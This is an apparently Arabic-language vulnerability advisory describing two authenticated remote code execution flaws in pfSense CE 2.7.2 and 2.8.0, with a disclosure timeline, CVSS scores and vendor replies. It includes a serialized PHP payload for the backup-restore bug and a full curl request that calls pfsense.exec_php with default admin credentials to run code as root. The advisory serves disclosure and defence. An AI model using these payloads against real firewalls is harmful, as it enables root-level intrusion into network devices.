
ثغرة RCE تتطلب مصادقة في Netgate pfSense CE 2.7.2 و 2.8.0
تنفيذ أكواد عن بُعد (RCE) مع مصادقة في Netgate pfSense Community Edition
| الحقل | التفاصيل |
|---|---|
| الباحث | Nelson Adhepeau (@privlabs) |
| المورّد | Netgate |
| المنتج | pfSense Community Edition |
| الإصدارات | 2.7.2 و 2.8.0 |
| النوع | تنفيذ أكواد عن بُعد (RCE) مع مصادقة |
| الإفصاح | فبراير 2026 |
| تاريخ إشعار المورّد | 2 ديسمبر 2025 |
| تاريخ تعيين CVE | 28 يناير 2026 |
أُجري هذا البحث في بيئات معملية معزولة لأغراض تعليمية ولزيادة الوعي الأمني فقط. تم الإفصاح عن جميع النتائج بمسؤولية إلى المورّد قبل النشر. لا يشكّل هذا التقرير دعوة لمهاجمة الأنظمة الإنتاجية. الاختبار غير المصرّح به غير قانوني.
تستدعي آلية استعادة الإعدادات في pfSense الدالة unserialize() على بيانات يتحكم بها المستخدم بدون قائمة بيضاء للفئات، أو تحقق من المدخلات، أو عزل (sandboxing).
يحقن ملف نسخة احتياطية مُعدّ بعناية، يحتوي على كائن PHP مُسلسَل خبيث، أوامر اعتباطية عبر الخاصية post_reboot_commands، والتي يتم تنفيذها عبر mwexec() بصلاحيات root كاملة.
[Attacker] → Login as admin
→ Upload malicious .xml backup file
→ Trigger restore
→ pfSense calls unserialize() on attacker data
→ post_reboot_commands executed via mwexec()
→ [ROOT SHELL]
config.php — منطق معالجة الاستعادةpfsense_module_installer — هدف إلغاء التسلسل غير الآمنmwexec() — مستقبِل تنفيذ الأوامرO:23:"pfsense_module_installer":1:{
s:17:"*post_reboot_commands";
a:1:{
i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
}
}
"تم الإقرار. صُنّف على أنه إساءة استخدام إدارية موثّقة. لن يتم إصدار أي تصحيح." — Netgate
يكشف pfSense CE 2.8.0 عن طريقة XMLRPC باسم pfsense.exec_php تقوم بتنفيذ أكواد PHP اعتباطية بصلاحيات root دون تحقق، أو عزل (sandboxing)، أو أي شكل من أشكال التقييد.
نقطة النهاية:
admin:pfsense)[Attacker] → Send XMLRPC request to /xmlrpc.php
→ Authenticate with admin:pfsense (default)
→ Call pfsense.exec_php with arbitrary PHP
→ Code executes as root, no sandboxing
→ [ROOT SHELL]
xmlrpc.php — نقطة دخول الواجهة البرمجية (API)pfsense.exec_php — تنفيذ أكواد ديناميكية غير آمنcurl -k -u admin:pfsense \
-H "Content-Type: text/xml" \
-d '<methodCall>
<methodName>pfsense.exec_php</methodName>
<params>
<param>
<value><string>system("id");</string></value>
</param>
</params>
</methodCall>' \
https://<target>/xmlrpc.php
"تم الإقرار. صُنّف على أنه سلوك متوقّع للمستخدمين الموثّقين. لا توجد خطة لإصدار تصحيح." — Netgate
November 2025 → Vulnerabilities discovered
December 2, 2025 → Responsible disclosure to Netgate
→ Vendor acknowledged, no patch planned
January 28, 2026 → CVE IDs assigned by MITRE
February 2026 → Public disclosure
[email protected]Nelson Adhepeau — باحث أمني مستقل
| الحقل | القيمة |
|---|
| CVSS v3.1 | 8.8 (عالي) |
| المتجه | AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-502, CWE-915 |
| نوع الهجوم | مصادَق عليه (مدير) |
| المكوّن | آلية النسخ الاحتياطي/الاستعادة |
| الحقل | القيمة |
|---|
| CVSS v3.1 | 9.9 (حرج) |
| المتجه | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-284, CWE-915 |
| نوع الهجوم | مصادَق عليه (عن بُعد، مصادقة أساسية) |
| المكوّن | واجهة XMLRPC البرمجية — pfsense.exec_php |